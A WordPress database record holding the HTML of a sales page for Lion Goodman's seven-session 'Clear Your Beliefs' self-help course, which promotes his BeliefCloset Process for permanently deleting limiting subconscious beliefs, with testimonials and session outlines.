(1032, 2, '2014-06-19 00:56:14', '2014-06-19 05:56:14', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that 